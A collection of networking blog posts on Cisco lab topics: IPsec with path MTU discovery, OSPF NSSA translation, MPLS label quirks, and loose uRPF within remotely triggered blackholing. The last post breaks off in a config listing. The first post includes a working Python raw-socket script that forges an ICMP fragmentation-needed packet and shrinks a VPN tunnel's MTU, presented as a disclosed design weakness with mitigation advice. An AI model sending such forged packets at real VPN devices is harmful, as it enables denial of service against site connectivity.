IPsec & path MTU discovery: feature or vulnerability?

IPsec is a well-established technology for building VPN tunnels between sites. Path MTU discovery (PMTUD) is a feature that provides end hosts and VPN head ends visibility into intermediate MTU along the path so that they could adjust their own MTU accordingly. Is it possible to use the two features simultaneously? Sure, there is even an article from Cisco that walks a reader through the operation step by step. Should the two features be used simultaneously? That’s the case I would like to cover in this article.

IPsec VPNs are predominantly security-oriented – there are a number of features to ensure the CIA triad (confidentiality, integrity, availability). IPsec device usually builds its tunnels over the Internet, so it has to withstand the attention of bad actors by design: the cost of the attack must be higher than the gain from it – that’s the idea that security is built upon. If you look closely at PMTUD over IPsec description, you would notice one peculiar aspect – the decision about a protected entity (MTU of the IPsec tunnel) is based on completely arbitrary feedback from the intermediate network (ICMP fragmentation needed). Is it possible to craft an ICMP packet that would decrease the MTU value to an unacceptable value?

Here is the topology we would use today for testing:

Most of the routers are running a rather common IOS image for 7200 – 15.2(4)M11. VPN4, however, is a newer platform CSR1000v, running IOS XE 16.9.3, which we would put under pressure. Attacker is an Ubuntu host that is going to forge ICMP replies. For the purpose of this lab both VPN head ends have PMTUD enabled. The real MTU restriction is on the link between VPN2 and ISP, so we would be able to validate PMTUD operation prior to meddling with VPN4. Here are the configuration lines for each of the device:

H1#show run | section router|interface
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
VPN2#show run | section router|ip route|crypto|interface
crypto isakmp policy 10
 authentication pre-share
crypto isakmp key cisco address 0.0.0.0        
crypto ipsec transform-set SET esp-aes 
 mode tunnel
crypto ipsec profile PROFILE
 set transform-set SET 
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface Tunnel0
 ip address 192.168.24.2 255.255.255.0
 ip ospf mtu-ignore
 tunnel source FastEthernet0/1
 tunnel mode ipsec ipv4
 tunnel destination 192.168.34.4
 tunnel path-mtu-discovery
 tunnel protection ipsec profile PROFILE
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
 ip mtu 1400
 ip ospf shutdown
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.34.4 255.255.255.255 192.168.23.3
ISP#show run | section interface          
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.100.3 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.3 255.255.255.0
 ip mtu 1400
interface FastEthernet1/0
 ip address 192.168.34.3 255.255.255.0
VPN4#show run | section router|ip route|interface|crypto
crypto isakmp policy 10
 authentication pre-share
crypto isakmp key cisco address 0.0.0.0        
crypto ipsec transform-set SET esp-aes 
 mode tunnel
crypto ipsec profile PROFILE
 set transform-set SET 
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface Tunnel0
 ip address 192.168.24.4 255.255.255.0
 ip ospf mtu-ignore
 tunnel source GigabitEthernet2
 tunnel mode ipsec ipv4
 tunnel destination 192.168.23.2
 tunnel path-mtu-discovery
 tunnel protection ipsec profile PROFILE
interface GigabitEthernet1
 ip address 192.168.45.4 255.255.255.0
interface GigabitEthernet2
 ip address 192.168.34.4 255.255.255.0
 ip ospf shutdown
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.23.2 255.255.255.255 192.168.34.3
H5#show run | section router|interface
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.45.5 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
root@Attacker#  tunctl -t tap0
root@Attacker#  ifconfig tap0 192.168.100.10/24 up
root@Attacker#  ip route add 192.168.34.0/24 via 192.168.100.3

Why is the ip ospf mtu-ignore command there on the tunnel interface? PMTUD is a unidirectional feature, so it is pretty possible that one VPN head end would already decrease its MTU while its peer is just about to uncover the restriction. If OSPF neighbourship is reset in such unfortunate circumstances, it cannot be restored by default due to MTU mismatch in DBD packets.

Before we run any tests, let’s start the packet capture between ISP and VPN4 – our little emulation of attacker’s reconnaissance. We’re interested only in ICMP packets at this point. PMTUD is performed by the packets with DF-bit set:

H5#ping 1.1.1.1 source 5.5.5.5 size 1400 df-bit 
Type escape sequence to abort.
Sending 5, 1400-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
Packet sent with the DF bit set
.M.M.
Success rate is 0 percent (0/5)
H5#
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit 
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
Packet sent with the DF bit set
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/46/52 ms
VPN4#show interface tunnel 0
Tunnel0 is up, line protocol is up 
<output omitted>
  Tunnel protocol/transport IPSEC/IP
  Tunnel TTL 255
  Path MTU Discovery, ager 10 mins, min MTU 92, MTU 1342, expires 00:09:28
  Tunnel transport MTU 1442 bytes
  Tunnel transmit bandwidth 8000 (kbps)
  Tunnel receive bandwidth 8000 (kbps)
  Tunnel protection via IPSec (profile "PROFILE")
<output omitted>

Good news – PMTUD is indeed operational: tunnel MTU is decreased to 1342 bytes. Beware, though: older IOS software does not show the MTU value in use:

Note: This change in value is stored internally and cannot be seen in the output of the show ip interface tunnel<#> command. You only see this change if you turn use the debug tunnel command.

Remember that ICMP Fragmentation Needed carries a part of the offending packet, so we might need it to forge our own ICMP reply:

Only ESP headers are included in ICMP, so the Attacker can intercept the packets and infer SPI and Sequence values – that should be enough to construct a packet that looks and feels legitimate. However, our task is even simpler: it is enough to trick VPN4 into decreasing MTU value significantly. Since a good engineer is a lazy engineer, we could just copy the contents of an intercepted ICMP reply and modify it accordingly:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

packet = bytearray(\
b"\x0c\x11\x72\x9e\x00\x01\xca\x03\x3c\xde\x00\x1c\x08\x00\x45\x00" \
b"\x00\x38\x00\x02\x00\x00\xff\x01\xf6\x6a\xc0\xa8\x22\x03\xc0\xa8" \
b"\x22\x04\x03\x04\xb2\x44\x00\x00\x05\x78\x45\x00\x05\xac\x04\xb3" \
b"\x40\x00\xfe\x32\xb8\x15\xc0\xa8\x22\x04\xc0\xa8\x17\x02\x5a\xe2" \
b"\xea\x4e\x00\x00\x00\x0e"
)

# Decrease MTU by 1024 bytes
packet[2*16 + 8] = (packet[2*16 + 8] - 0x04) % 256

# Compute high byte of checksum word
hbyte = packet[2*16 + 4] + 0x04

# If high byte is overflown, compensate carryover
if hbyte > 255:
    packet[2*16 + 5] = packet[2*16 + 5] + 1
    hbyte -= 256

# Adjust high byte of checksum
packet[2*16 + 4] = hbyte

packet = packet[14:]
s.sendto(packet, ('192.168.34.4', 0))

Checksum adjustment involves a bit of ancient magic in case of the carryover, though the idea itself is simple – decrease the LSB of MTU while increasing LSB of Checksum. Quite straightforward, isn’t it? Let’s see whether it has any effect:

root@Attacker# python3 pckt.py
VPN4#show interfaces tunnel0
Tunnel0 is up, line protocol is up
<output omitted>
Tunnel protocol/transport IPSEC/IP
Tunnel TTL 255
Path MTU Discovery, ager 10 mins, min MTU 92, MTU 318, expires 00:09:48
Tunnel transport MTU 1442 bytes
Tunnel transmit bandwidth 8000 (kbps)
Tunnel receive bandwidth 8000 (kbps)
Tunnel protection via IPSec (profile "PROFILE")
<output omitted>
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit 
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
M.M.M
Success rate is 0 percent (0/5)

Evidently, the attack is successful. Implications? Well, for starters, packets with DF-bit cannot make it through, so the availability of VPN service is impacted. The regular packets would still get fragmented and sent over the IPsec tunnel. The fragmentation is always done by CPU though, so the spike of fragmented packets would result in CPU spike; in such a case router availability would be at risk, potentially denying the service altogether to the whole site.

Is it a defect though? Unfortunately, it is not a bug to be fixed, but a flaw in the feature design: router has to trust unauthenticated packets from an arbitrary source within the transit network. Even if ICMP reply included some part of ESP payload with any anti-replay protection, ICV value would most likely be omitted, thus sacrificing ESP integrity check. In the end, the only way to avoid such an attack is to disable PMTUD on the tunnel and configure MTU manually. Luckily, most of the paths in the modern Internet can cope with default MTU of 1500, so static MTU for a tunnel should perform fine.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn, Twitter

OSPF NSSA: yet another way to shoot yourself in the foot

There are quite a few blogposts on the Internet, explaining that complex OSPF setup is usually more complicated than it’s worth. One of the quirks, contributing to such overcomplication, is not-so-stubby area (NSSA). If you’re not yet convinced by the naming of the feature, take a look at this post by Ivan Pepelnjak. Still interested? I’ve got one more example for you that might divert your design decision to BGP for complex scenarios.

Here is a sample topology:

Area 1 is NSSA, so both R1 and R2 are ABRs. R1 is also ASBR that redistributes 1.1.1.1/32 prefix. All links have default cost of 1 with a single exception – R1-R2 acts as backup so it has an increased cost of 10. Here is the basic config for such a setup:

R1#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.13.1 255.255.255.0
 ip ospf 1 area 0
router ospf 1
 router-id 1.1.1.1
 area 1 nssa
 redistribute connected subnets
R2#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.24.2 255.255.255.0
router ospf 1
 router-id 2.2.2.2
 area 1 nssa
 network 0.0.0.0 255.255.255.255 area 0
R3#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.34.3 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.13.3 255.255.255.0
router ospf 1
 router-id 3.3.3.3
 network 0.0.0.0 255.255.255.255 area 0
R4#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.34.4 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.24.4 255.255.255.0
router ospf 1
 router-id 4.4.4.4
 network 0.0.0.0 255.255.255.255 area 0

R4 should have two paths to 1.1.1.1/32:

  1. the primary one through R3 due to LSA5, originated by R1;
  2. the backup one through R2 due to LSA5, originated by R2 based on LSA7 contents.

However, that’s not the case:

R4#show ip os database | begin Type-5
		Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
1.1.1.1         1.1.1.1         876         0x80000002 0x0099FD 0

Maybe the LSAs are considered functionally equivalent? Unlikely, since LSA5 from R1 should have lost to the competition (1.1.1.1 is lower than 2.2.2.2). Well, let’s check the connectivity first:

R4#traceroute 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.3 48 msec 44 msec 52 msec
  2 192.168.13.1 44 msec 48 msec 48 msec

The primary path is definitely operational, so let’s verify that the backup one would kick in properly:

R3(config)#interface FastEthernet 0/1
R3(config-if)#ip ospf shutdown
R4#ping 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4 
.....
Success rate is 0 percent (0/5)
R4#
R4#show ip route 1.1.1.1   
% Network not in table

As you can see, there is no backup route at all! There is also sickening void in LSDB as well:

R4#show ip ospf database          

            OSPF Router with ID (4.4.4.4) (Process ID 1)

		Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         1186        0x80000005 0x0092A2 1
2.2.2.2         2.2.2.2         1437        0x80000006 0x006991 2
3.3.3.3         3.3.3.3         90          0x80000007 0x0032A8 2
4.4.4.4         4.4.4.4         1293        0x80000004 0x00AD0A 3

		Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.13.1    1.1.1.1         1186        0x80000004 0x00E8C2
192.168.24.2    2.2.2.2         1437        0x80000002 0x009FF5
192.168.34.3    3.3.3.3         1357        0x80000002 0x002B57

		Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.12.0    1.1.1.1         1446        0x80000002 0x009721
192.168.12.0    2.2.2.2         1437        0x80000003 0x00773C
          
		Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
1.1.1.1         1.1.1.1         1446        0x80000002 0x0099FD 0

Note that LSAs from R1 are not flushed by other routers in the area. However, the graph is disjoined (there is no bidirectional edge between R1 and R3), so 1.1.1.1/32 is considered unreachable through R3. If you’d like more information on OSPF graph computation process, check out this post. However, the main mystery is not solved yet.

There will be no salvation though: LSA5 will never get generated by R2 according to RFC 1587 (same holds true for RFC 3101 as well):

If a router is attached to another AS and is also an NSSA area border router, it may originate a both a type-5 and a type-7 LSA for the same network.  The type-5 LSA will be flooded to the backbone (and all attached type-5 capable areas) and the type-7 will be flooded into the NSSA.  If this is the case, the P-bit must be reset in the type-7 NSSA so the type-7 LSA isn’t again translated into a type-5 LSA by another NSSA area border router.

As you could have already guessed, that’s exactly our case (No Type 7/5 translation option):

R2#show ip ospf database nssa-external 

            OSPF Router with ID (2.2.2.2) (Process ID 1)

		Type-7 AS External Link States (Area 1)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 248
  Options: (No TOS-capability, No Type 7/5 translation, DC, Upward)
  LS Type: AS External Link
  Link State ID: 1.1.1.1 (External Network Number )
  Advertising Router: 1.1.1.1
  LS Seq Number: 80000005
  Checksum: 0x771B
  Length: 36
  Network Mask: /32
	Metric Type: 2 (Larger than any link state path)
	MTID: 0 
	Metric: 20 
	Forward Address: 0.0.0.0
	External Route Tag: 0

Conclusion? Don’t make the complex protocol even more complicated. If it’s an absolute must, then stick to the designs, published by vendors, test everything you can lay your hands on and don’t deviate from the two points above – vendor support and infrastructure availability are at stake here.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn, Twitter

MPLS: a bit of this, a bit of that

Introduction

If you have ever worked with MPLS either in a lab or in production, you should have noticed that the technology itself is fairly straightforward. However, there are quite a few quirks that might make life more difficult than it has to be. Most of those peculiar aspects are extensively discussed by Pleiades of posts on the net, but not all of them, unfortunately. Today I’d like to make a humble contribution. to the knowledge base of a few less known/described features that do not really warrant a separate post but are interesting nevertheless.

The topology is utterly straightforward:

MPLS is deployed within ISP just for traffic encapsulation – no typical use case (L3VPN, TE, etc.) is active here. IGP is vanilla OSPF while the purpose for the several areas is to allow some minor routing manipulation on PEs. Below you could find the initial configs:

CE1#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface Loopback1
 ip address 1.1.2.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
router ospf 1
 router-id 1.1.1.1
 network 0.0.0.0 255.255.255.255 area 1
PE1#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
 ip ospf 1 area 1
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
router ospf 1
 mpls ldp autoconfig area 0
 router-id 2.2.2.2
 area 1 range 1.1.1.0 255.255.255.0
 network 0.0.0.0 255.255.255.255 area 0
P#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
 ip address 192.168.23.3 255.255.255.0
interface FastEthernet1/0
 ip address 192.168.34.3 255.255.255.0
router ospf 1
 mpls ldp autoconfig
 router-id 3.3.3.3
 network 0.0.0.0 255.255.255.255 area 0
PE2#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.45.4 255.255.255.0
 ip ospf 1 area 2
interface FastEthernet1/0
 ip address 192.168.34.4 255.255.255.0
router ospf 1
 mpls ldp autoconfig area 0
 network 0.0.0.0 255.255.255.255 area 0
CE2#show run | section FastEthernet|router|Loopback
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.45.5 255.255.255.0
router ospf 1
 router-id 5.5.5.5
 network 0.0.0.0 255.255.255.255 area 2

Story 1: PHP confession

The theory behind penultimate hop popping (PHP) is widely known and described; here is a good recap if you feel rusty. However, most of the authors omit several important details to make the introduction to the topic easier.

  1. Labels are allocated by LDP for all prefixes except the ones received from BGP. In the latter case BGP is the protocol responsible for label allocation, be it VPNv4 AF, labelled unicast or any other relevant application.
  2. Although PHP removes a lookup in a general case, implicit-null label applies only to connected and aggregated routes, the transit one are still allocated a corresponding label. The reason is simple: both connected and aggregated routes require a lookup anyway, while transit routes can be forwarded further based on the label.

Let’s verify that last statement in our lab:

CE2#show ip route ospf
<output omitted>

      1.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
O IA     1.1.1.0/24 [110/5] via 192.168.45.4, 00:07:20, FastEthernet0/0
O IA     1.1.2.1/32 [110/5] via 192.168.45.4, 00:05:26, FastEthernet0/0
      2.0.0.0/32 is subnetted, 1 subnets
O IA     2.2.2.2 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
      3.0.0.0/32 is subnetted, 1 subnets
O IA     3.3.3.3 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
      4.0.0.0/32 is subnetted, 1 subnets
O IA     4.4.4.4 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA  192.168.12.0/24 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA  192.168.23.0/24 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA  192.168.34.0/24 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
CE2#
CE2#traceroute 1.1.1.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.45.4 12 msec 12 msec 8 msec
  2 192.168.34.3 [MPLS: Label 23 Exp 0] 48 msec 12 msec 32 msec
  3 192.168.23.2 68 msec 36 msec 40 msec
  4 192.168.12.1 76 msec 96 msec 44 msec
CE2#
CE2#traceroute 192.168.12.1 source 5.5.5.5            
Type escape sequence to abort.
Tracing the route to 192.168.12.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.45.4 8 msec 16 msec 12 msec
  2 192.168.34.3 [MPLS: Label 19 Exp 0] 12 msec 32 msec 28 msec
  3 192.168.23.2 64 msec 44 msec 44 msec
  4 192.168.12.1 56 msec 48 msec 60 msec
CE2#
CE2#traceroute 1.1.2.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.2.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.45.4 16 msec 20 msec 20 msec
  2 192.168.34.3 [MPLS: Label 24 Exp 0] 52 msec 64 msec 56 msec
  3 192.168.23.2 [MPLS: Label 23 Exp 0] 64 msec 48 msec 64 msec
  4 192.168.12.1 100 msec 80 msec 84 msec

Note that the allocated labels are different due to per-prefix label allocation. Connected routes require a lookup, since it’s not possible to infer the next-hop and corresponding L2 information from the ingress label; the same is valid for the summary as well. The packet towards 1.1.2.1/32, however, can be forwarded to its next-hop immediately:

PE1#show mpls forwarding-table 1.1.1.0 24 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
None       No Label   1.1.1.0/24       0             punt       
	MAC/Encaps=0/0, MRU=0, Label Stack{}
	No output feature configured
PE1#
PE1#show mpls forwarding-table 192.168.12.0 24 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
None       No Label   192.168.12.0/24  0             punt       
	MAC/Encaps=0/0, MRU=0, Label Stack{}
	No output feature configured
PE1#
PE1#show mpls forwarding-table 1.1.2.1 32 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
23         No Label   1.1.2.1/32       672           Fa0/0      192.168.12.1
	MAC/Encaps=14/14, MRU=1504, Label Stack{}
	CA010BDB0008CA020BDF00080800 
	No output feature configured

Story 2: peculiar loopback

Another curious behaviour is connected with “misconfiguring” loopback subnet mask. It is widely accepted that loopback should have /32 mask. Indeed, why waste precious addressing space? However, my hand has slipped several times to configure familiar /24 mask in a lab. The consequences might be sometimes difficult to grasp and troubleshoot. Let’s make a change to our topology:

PE1(config)#interface loopback 0
PE1(config-if)#ip address 2.2.2.2 255.255.255.0

Nothing major, right? However, your LSP has just broke down:

PE2#traceroute mpls ipv4 2.2.2.0/24 source 4.4.4.4 verbose 
Tracing MPLS Label Switched Path to 2.2.2.0/24, timeout is 2 seconds

Codes: '!' - success, 'Q' - request not sent, '.' - timeout,
  'L' - labeled output interface, 'B' - unlabeled output interface, 
  'D' - DS Map mismatch, 'F' - no FEC mapping, 'f' - FEC mismatch,
  'M' - malformed request, 'm' - unsupported tlvs, 'N' - no label entry, 
  'P' - no rx intf label prot, 'p' - premature termination of LSP, 
  'R' - transit router, 'I' - unknown upstream index,
  'X' - unknown return code, 'x' - return code 0

Type escape sequence to abort.
  0 4.4.4.4 0.0.0.0 MRU 0 [No Label]
Q 1 *

The reason for the outage is the absence of relevant label on P. It could be that the route is not propagating correctly:

P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes 
<output omitted>
      2.0.0.0/32 is subnetted, 1 subnets
O        2.2.2.2 [110/2] via 192.168.23.2, 01:24:24, FastEthernet0/1
P#
P#show ip cef 2.2.2.2/32 detail
2.2.2.2/32, epoch 0
  local label info: global/16
  nexthop 192.168.23.2 FastEthernet0/1

No, it’s exactly as we’ve intended it to be, except for the lack of label in the CEF output. Labels are distributed by LDP, so let’s check what we receive from PE1 on P:

P#show mpls ldp bindings neighbor 2.2.2.2    
  lib entry: 1.1.1.0/24, rev 22
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 1.1.1.1/32, rev 27
	remote binding: lsr: 2.2.2.2:0, label: 16
  lib entry: 1.1.2.1/32, rev 24
	remote binding: lsr: 2.2.2.2:0, label: 23
  lib entry: 2.2.2.0/24, rev 28
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 3.3.3.3/32, rev 2
	remote binding: lsr: 2.2.2.2:0, label: 18
  lib entry: 4.4.4.4/32, rev 16
	remote binding: lsr: 2.2.2.2:0, label: 20
  lib entry: 5.5.5.5/32, rev 20
	remote binding: lsr: 2.2.2.2:0, label: 22
  lib entry: 192.168.12.0/24, rev 14
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 192.168.23.0/24, rev 4
	remote binding: lsr: 2.2.2.2:0, label: imp-null
  lib entry: 192.168.34.0/24, rev 6
	remote binding: lsr: 2.2.2.2:0, label: 19
  lib entry: 192.168.45.0/24, rev 18
	remote binding: lsr: 2.2.2.2:0, label: 21

The label for 2.2.2.0/24 is correctly listed as implicit-null. Have you noticed anything off by now?

P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes 
<output omitted>
      2.0.0.0/32 is subnetted, 1 subnets
O        2.2.2.2 [110/2] via 192.168.23.2, 01:30:17, FastEthernet0/1
P#               
P#show mpls ldp bindings 2.2.2.0 24
  lib entry: 2.2.2.0/24, rev 28
	remote binding: lsr: 2.2.2.2:0, label: imp-null

The subnet masks do not match! OSPF ignores non-host masks on loopbacks by default and announces loopback addresses as /32. However, LDP plays by the sensible rules and distributes /24 as configured. P cannot match prefix in RIB to the binding in LIB, hence the lack of outgoing label. Fix is fairly simple if you played with OSPF long enough:

PE1(config)#interface loopback 0
PE1(config-if)#ip ospf network point-to-point
PE2#traceroute mpls ipv4 2.2.2.0/24 source 4.4.4.4 verbose 
Tracing MPLS Label Switched Path to 2.2.2.0/24, timeout is 2 seconds

Codes: '!' - success, 'Q' - request not sent, '.' - timeout,
  'L' - labeled output interface, 'B' - unlabeled output interface, 
  'D' - DS Map mismatch, 'F' - no FEC mapping, 'f' - FEC mismatch,
  'M' - malformed request, 'm' - unsupported tlvs, 'N' - no label entry, 
  'P' - no rx intf label prot, 'p' - premature termination of LSP, 
  'R' - transit router, 'I' - unknown upstream index,
  'X' - unknown return code, 'x' - return code 0

Type escape sequence to abort.
  0 192.168.34.4 192.168.34.3 MRU 1500 [Labels: 18 Exp: 0]
L 1 192.168.34.3 192.168.23.2 MRU 1504 [Labels: implicit-null Exp: 0] 16 ms, ret code 8
! 2 192.168.23.2 40 ms, ret code 3
PE2#
PE2#show ip cef 2.2.2.2 detail                                
2.2.2.0/24, epoch 0
  local label info: global/19
  nexthop 192.168.34.3 FastEthernet1/0 label 18

Story 3: once upon a time there was no loopback

Overlay VPN setups typically employ loopbacks as BGP next-hops. Besides obvious reasons like load-balancing, transport resiliency and such, there is a more stringent requirement why one cannot use physical interface as L3VPN headend – PHP. Take our topology as an example. PE2, that is located one hop away from PE1, would not swap transport label towards 192.168.23.2 for some value but it would instead pop it, because P announces implicit-null for its connected route.

PE2#traceroute 192.168.23.2 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.3 20 msec 24 msec 12 msec
  2 192.168.23.2 8 msec 28 msec 24 msec

As a result, if it were L3VPN setup, P would receive the packet with VPN label on top, so it would either drop the packet or you might experience the most fascinating forwarding that Hogwarts can provide.

What if you cannot use a loopback for peering? To be honest, I cannot think of a valid reason for such a case, except for some weird CCIE lab, so this is purely an abstract discussion. Anyway, you must ensure that PE1 interface IP is not recognized by P as directly connected. Newer IOS images do include /32 into RIB, called Local route, but these routes are not announced by OSPF. However, OSPF does announce interface /32 addresses in P2M scenario:

PE1(config)#interface f0/1
PE1(config-if)#ip ospf network point-to-multipoint
P(config)#interface f0/1
P(config-if)#ip ospf network point-to-multipoint

Voila! OSPF RIB entry and LDP bindings are both created, so LSP is functional again:

P#show mpls forwarding-table 192.168.23.2 32 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
17         Pop Label  192.168.23.2/32  252           Fa0/1      192.168.23.2
	MAC/Encaps=14/14, MRU=1504, Label Stack{}
	CA020BDF0006CA030BFB00068847 
	No output feature configured
PE2#traceroute 192.168.23.2 source lo 0
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.3 [MPLS: Label 17 Exp 0] 4 msec 16 msec 8 msec
  2 192.168.23.2 12 msec 32 msec 28 msec

Conclusion

In this article we’ve discussed several aspects of generic MPLS setup: PHP operation, loopback misconfig with OSPF, consequences of such a mischief as well as CCIE lab maniac scenario. I hope you’ve enjoyed it, so stay tuned for more!

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn, Twitter

Loose uRPF – why?

There are quite a few articles in the wild, explaining the Unicast Reverse Path Forwarding (uRPF) feature and its two modes: strict and loose. Although the operational difference between the two modes is the primary focus of such posts, they rarely cover why these two flavours exist in the first place, at least under the Google search for “loose vs strict uRPF”. Today I’d like to close such a gap and highlight the connection between loose uRPF and the yet unknown feature.

Before we start discussing the modes, a quick recap is in order. RPF is a feature from the multicast world that prevents loops in the data plane: it compares the source address of IP packet to the RIB; if the ingress interface matches the route towards the source address, packet is forwarded further, otherwise it’s a loop and the packet is discarded. Unicast RPF stems from the same idea – verify that the packet comes from a valid direction. Strict uRPF operates in the same way as its counterpart from the multicast feature set; loose uRPF, however, does not check the interface – just the availability of a valid route. There is a single notable exception to such a description though: if next-hop interface for the source address is Null0, the packet is also discarded. Cisco provides the use case for the feature as well:

To provide ISPs with a DDoS resistance tool on the ISP-to-ISP edge of a network, Unicast RPF was modified from its original strict mode implementation to check the source addresses of each ingress packet without regard for the specific interface on which it was received. This modification is known as “loose mode.”

Security Configuration Guide: Unicast Reverse Path Forwarding, Cisco IOS XE 17 (Cisco ASR 920 Routers)

Does the ISP-to-ISP DDoS protection sound familiar? It is indeed part of the Remotely Triggered Blackhole (RTBH). The destination-based RTBH uses BGP communities to notify ISP which destination is under attack, so that the ISP can temporarily drop offending traffic. Obviously, the legitimate traffic is discarded too in such a case. Wouldn’t it be better if the traffic could be dropped based on the offending source IP? This is exactly the use case for the source-based RTBH: if loose uRPF is added to the destination-based RTBH setup, attacker’s IP address can be marked by BGP community and further forwarded to the void. Here is a nice article on the RTBH that explains the solution, using IOS XR platform.

Disclaimer: there wil be no extra revelations further down the text, so if you already grasped the idea, feel free to skip the rest of the post.

Let’s build a simple topology to verify the loose uRPF within the RTBH feature:

ISP network consists of 2 PE routers that are using the same BGP AS. CE1 and CE2 are customer routers that peer with ISP using eBGP. Important note: IOS XE requires that a directly connected eBGP neighbour and its prefixes are reachable via the same physical egress interface, otherwise, the received routes are considered inaccessible. The workaround is simple though – disable-connected-check on PE, that performs next-hop replacement.  Here is the basic routing and addressing config:

CE1#show run | section interface|router|ip route
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.13.3 255.255.255.0
router bgp 3
 bgp router-id 3.3.3.3
 no bgp default ipv4-unicast
  neighbor 192.168.13.1 remote-as 12
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
